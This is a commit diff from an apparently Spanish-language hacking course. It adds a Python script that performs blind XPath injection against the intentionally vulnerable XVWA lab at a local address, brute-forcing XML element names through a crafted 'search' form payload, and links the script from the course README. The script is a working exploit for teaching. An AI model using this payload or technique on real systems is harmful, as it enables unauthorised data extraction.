Update tema 6

Introduccion-hacking-hack4u/tema_6_owasp/26_xpath/xpath_injection.py

@@ -0,0 +1,69 @@
+#!/var/bin/env python
+
+
+import pdb
+import requests
+import signal
+import string
+import sys
+import time
+
+from pwn import *
+
+# Ctrl-C handler
+
+
+def signal_handler(signal, frame):
+
+    print('\n\n[!] Ctrl-C. Saliendo...')
+    sys.exit(1)
+
+
+signal.signal(signal.SIGINT, signal_handler)
+
+
+# Variables globales
+
+main_url = "http://192.168.1.142/xvwa/vulnerabilities/xpath/"
+characters = string.ascii_letters
+
+
+def xPathInjection():
+
+    data = ""
+
+    p1 = log.progress("Inyeccion XPath")
+    p1.status("Iniciando ataque de fuerza bruta")
+
+    time.sleep(2)
+
+    p2 = log.progress("Data")
+
+    for position in range(1, 8):
+
+        for character in characters:
+            # post_data = {
+            #     'search': "1' and substring(name(/*[1]),%d,1)='%s" % (position, character),
+            #     'submit': ''
+            # }
+
+            post_data = {
+                'search': "1' and substring(name(/*[1]/*[1]),%d,1)='%s" % (position, character),
+                'submit': ''
+            }
+
+            r = requests.post(main_url, data=post_data)
+
+            if len(r.text) != 8686:
+
+                data += character
+                p2.status(data)
+                break
+
+    p1.success("Inyeccion XPath completada")
+    p2.success("Data: %s" % data)
+
+
+if __name__ == "__main__":
+
+    xPathInjection()

Introduccion-hacking-hack4u/tema_6_owasp/README7.md

@@ -39,6 +39,7 @@ Para protegerse contra las vulnerabilidades de XPath, es importante validar toda
 A continuación, se proporciona el enlace directo de descarga a la máquina XVWA 1 de Vulnhub, la cual usamos en esta clase para explotar las vulnerabilidades existentes en XPath:
 
 - XVWA 1: https://www.vulnhub.com/entry/xtreme-vulnerable-web-application-xvwa-1,209/
+- script Python [xpath_injection.py](./26_xpath/xpath_injection.py)
 
 
 ## 6.27 Insecure Direct Object Reference (IDORs)